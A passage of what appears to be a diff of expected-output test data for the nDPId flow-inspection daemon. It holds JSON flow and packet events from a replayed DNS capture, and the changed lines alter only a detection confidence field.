fOLAqGuOeclFjzqz3OdAJWeg\/AAnSbb02AGCkQ370TX1hWveAXt6xpPWOLgHXSLIF\/lz+wl+Dm8ZNWDnn5zEJuEj3xova1g8zmRXJOmqA6VhGqewxF8c+yKeNEOHz4X4\/RLmWHIuEbvboP00Dk5A9bhyZGVsytOJg+NwhFQtvBWLmD82FFtfSt2vmbFFNwAZOnRZWJOG9L7TFcGIm1OEULmohUyFLsBGMXDFOu1k0o6pqm495tsBuMyJNpfdQoPwOkUpsKi6jmNq6vRjvvNiJbcFylTQrqHGTGuOopuUsBbUXj\/nOr4I6j42k6GDIuTyLDkaVrdrxXmGnfNnStdqWmvHXo\/YFwdls9bcT7wAwALgABAAAAPAIfADAKAgAAADxdChURXOJ+MzN7CHdlYmVybGFiAmRlAB+yP4V\/njTX1ZrAUX52Q4ppNzTYQFwUb\/fZ7UyQYLNxrrstLuUEImGhNwZoGn47E0jCxJscYiApT\/lYiL2L1ySUl4RKqHIjPNuYuibs67t5ZabkYsahlYEA\/lOcM3eIQx9pu5Og7p1d2yBSUETOBiGw2mFf2+ESni6Ue4XPXEEYzAhiMRhuYOJAy8gBqoPjkRBcJfWJSQLCsK1uYySkTZfbAzgJeVM0nXd6azgG0BhRE+LeaO6rN3QVHDtfgnwRdZ0mqwEcP9Ixz7o9MUVSKZ24Kp1QfS5nvEHn5PilNALbZYZOO0cQAeV8BhlxVuALLDecEOLC8sY1mx6ozY5\/aRypyHA9HCrJT0qIHJwgtxE7ldoWyzsz32MKgZvCYMZSPOXK\/W3p61FPtD4iT4Id6xXDvyRuALL3waMUMwy3mSjXDHAdpXWaCOMfYx2IzRk4rN5TDQtUohYwaoSbystwDYKnhZGi9jS0G8FObyWhTrKCl7aTkMBaFEejCh0dfD5WJP+MDS\/TR32BG0S+GtGTl4n1Y8wgyP7nkz3\/REcevkIvpJRUImVc8A\/VPTI+9KvBSkoLPA9Za\/IpqUpgDVsKWU5bp0V0TdEryxvtwOnVXXdH0\/hJMgIgWhmZzY2\/UVoRBVGptWsAIhn5sO+UhcjvZ41p3t\/1mWp23BdUACblNtHcw2MALgABAAAAPAEfADAKAgAAADxdChURXOJ+M5BHCHdlYmVybGFiAmRlAHoYKuiyNMNSWsfXwtRR8n\/pKy73at02yEwt1EoWyfptV8sUoxs="} -00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968021026,"flow_last_seen":1558968021027,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1558968021027,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968021026,"flow_last_seen":1558968021027,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1558968021027,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 00210{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":17,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":230,"global_ts_msec":1558968021027} 00631{"packet_event_id":1,"packet_event_name":"packet","packet_id":17,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":264,"pkt_l4_len":0,"thread_ts_msec":1558968021027,"pkt":"AIac51UUAAwpil3XCABFAAD6iTwAuUAR0PHBGOPuSn0viJJWaQ8FS9tIHo+oVjY51cy6+fgiJNB2zCSb2h1J8D40RJyUZYc0lguNGrMzvogBYnbxInuDKD2B8SGaumxsynJulBSZTde74knucmk+7g4DbM0zyfRD0W3RhD3u0NFdji\/0zmiI817VkCE2GpVvuL3F8KDCC+EMYjJlOHqM+STJxPq9ZF8xJcVITkC6EY6CdRmYmQdqvRYWzDXPjGtyu5XT13H1VC8IJisNUehBDr2PeppANUdXFlyqVQ6mARL6UnTBT0xam7DpmuxycO7BOql2rC7KBJb4lykg9AAAKRAAAACAAAAA"} 
00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968031134,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1558968031134,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":121,"pkt_l4_len":67,"thread_ts_msec":1558968031134,"pkt":"AAwpil3XAIac51UUht1gCRS7AEMRbCoAFFBAEwwFAAAAAAAAAQ4gAQRwdlsAAAAAAAAKJQBTiIAANQBD+GeeBgAQAAEAAAAAAAEDZmcyCHdlYmVybGFiAmRlAAAcAAEAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968031134,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968031134,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 01581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1558968031134,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":886,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":886,"pkt_l4_len":832,"thread_ts_msec":1558968031134,"pkt":"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\/djMG\/LpzWXoT2evp9l8K1VcJU\/8uUY9ZE4WS0WjV4uuPKKqmHeTkethHG1xsLp0jKFQP8kYfYkdlxDBuNu6KhurVxO4RiM92K63vMdmIW\/4VjMYm2cPPQCBWTlI1U0hKRjVHQ1RFQ1RIN0wwRUNLTEoxTkRGNE04S8CHADIAAQAAALQAMgEAABQQM4lV2XYIwLE0ewVnw5K1+BQAQBNLJ89Pbt3WSJZWXFg+eo1pkwAGQAAAAAACwZQALgABAAAAtAEfADIKAwAAALRdChEDXOJ73JBHCHdlYmVybGFiAmRlAFwWgMgEjrA1OcHB+Qo5dWmMix1bJ7WFGsQIkPmTlF\/KVvK6k5dVU4FDCZtKPuPYCkg0XLBOcR\/wguOUuuyBL7cbjUoN0UHJur34eNeWLngpBhaxFTmuqY80vKjed0ttFQ6uVnd2OAmDzRp6YxYtTin4\/XGlVO6lMt+k2mYftwRyr5Ohjp6NH+J8dbjX7gkD3ENGAHspVLSTz4LxrhUH8dsbFK8rT\/kUhlCBvTuJYAxOkSEWqp4vVZ54PXcY61pn5KAT8mJWdw+HLsa\/lUjZNXicEmky99XDlPLcJk7OI3ZM83QYPgYAFE\/lMHbTSiiue2rS4deUwWxFmnQYlhv0FA4AACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="} 
-00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"thread_ts_msec":1558968031134,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"thread_ts_msec":1558968031134,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":14,"total-skipped-flows":0,"total-l4-payload-len":9318,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":7,"total-updates":0,"current-active-flows":7,"total-active-flows":7,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":48,"global_ts_msec":1559042371783} 00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042371783,"flow_last_seen":1559042371783,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042371783,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1559042371783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":123,"pkt_l4_len":69,"thread_ts_msec":1559042371783,"pkt":"CFsOoYNeAAwpfKTLht1gCrtxAEURQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBTuhIANQBFzxq5yAEgAAEAAAAAAAEIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAQAAKRAAAAAAAAAMAAoACJyfIZPEos+4"} 
-00813{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042371783,"flow_last_seen":1559042371783,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042371783,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00813{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042371783,"flow_last_seen":1559042371783,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042371783,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00789{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1559042371794,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":300,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":300,"pkt_l4_len":246,"thread_ts_msec":1559042371794,"pkt":"AAwpfKTLCFsOoYNeht1gDo22APYRPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLADW6EgD2hIi5yIUAAAEAAQACAAUIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAcAMABwAAQAAADwAECABBHAfCxawAAAAAAAAAAHAFQACAAEAAAA8AA8DbnMxCHdlYmVyZG5zwB7AFQACAAEAAAA8AAYDbnMywFLATgAcAAEAAA4QABAgAQRwdlsAAAAAAAAKJQBTwGkAHAABAAAOEAAQIAEEcB8LFrAAAAAACiYAU8BOAAEAAQAADhAABMEY4+7AaQABAAEAAA4QAATC9wUOAAApEAAAAAAAABwACgAYnJ8hk8Siz7hkUeklXO0ZQ\/LRIFOjEc9n"} -00828{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042371783,"flow_last_seen":1559042371794,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1559042371794,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} 
+00828{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042371783,"flow_last_seen":1559042371794,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1559042371794,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} 00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042372779,"flow_last_seen":1559042372779,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042372779,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1559042372779,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":123,"pkt_l4_len":69,"thread_ts_msec":1559042372779,"pkt":"CFsOoYNeAAwpfKTLht1gBVO1AEURQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBTgzgANQBFzxq9qQEgAAEAAAAAAAEIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAQAAKRAAAAAAAAAMAAoACOxvEogaB96P"} -00813{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042372779,"flow_last_seen":1559042372779,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042372779,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00813{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042372779,"flow_last_seen":1559042372779,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042372779,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00788{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1559042372791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":300,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":300,"pkt_l4_len":246,"thread_ts_msec":1559042372791,"pkt":"AAwpfKTLCFsOoYNeht1gDjr2APYRPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLADWDOAD2QdK9qYUAAAEAAQACAAUIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAcAMABwAAQAAADwAECABBHAfCxawAAAAAAAAAAHAFQACAAEAAAA8AA8DbnMxCHdlYmVyZG5zwB7AFQACAAEAAAA8AAYDbnMywFLATgAcAAEAAA4QABAgAQRwdlsAAAAAAAAKJQBTwGkAHAABAAAOEAAQIAEEcB8LFrAAAAAACiYAU8BOAAEAAQAADhAABMEY4+7AaQABAAEAAA4QAATC9wUOAAApEAAAAAAAABwACgAY7G8SiBoH3o+7l8juXO0ZRLEjB1nyQ3R8"} -00828{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042372779,"flow_last_seen":1559042372791,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1559042372791,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} 
+00828{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042372779,"flow_last_seen":1559042372791,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1559042372791,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} 00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042373843,"flow_last_seen":1559042373843,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042373843,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1559042373843,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":123,"pkt_l4_len":69,"thread_ts_msec":1559042373843,"pkt":"CFsOoYNeAAwpfKTLht1gAgwqAEURQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBTtOwANQBFzxrdhAEgAAEAAAAAAAEIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAQAAKRAAAAAAAAAMAAoACKUAwuOvHQbi"} -00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042373843,"flow_last_seen":1559042373843,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042373843,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042373843,"flow_last_seen":1559042373843,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042373843,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00789{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1559042373854,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":300,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":300,"pkt_l4_len":246,"thread_ts_msec":1559042373854,"pkt":"AAwpfKTLCFsOoYNeht1gCMIUAPYRPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLADW07AD2Jy7dhIUAAAEAAQACAAUIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAcAMABwAAQAAADwAECABBHAfCxawAAAAAAAAAAHAFQACAAEAAAA8AA8DbnMyCHdlYmVyZG5zwB7AFQACAAEAAAA8AAYDbnMxwFLAaQAcAAEAAA4QABAgAQRwdlsAAAAAAAAKJQBTwE4AHAABAAAOEAAQIAEEcB8LFrAAAAAACiYAU8BpAAEAAQAADhAABMEY4+7ATgABAAEAAA4QAATC9wUOAAApEAAAAAAAABwACgAYpQDC468dBuIqFazGXO0ZRcWgFHZl7TCh"} -00829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042373843,"flow_last_seen":1559042373854,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1559042373854,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 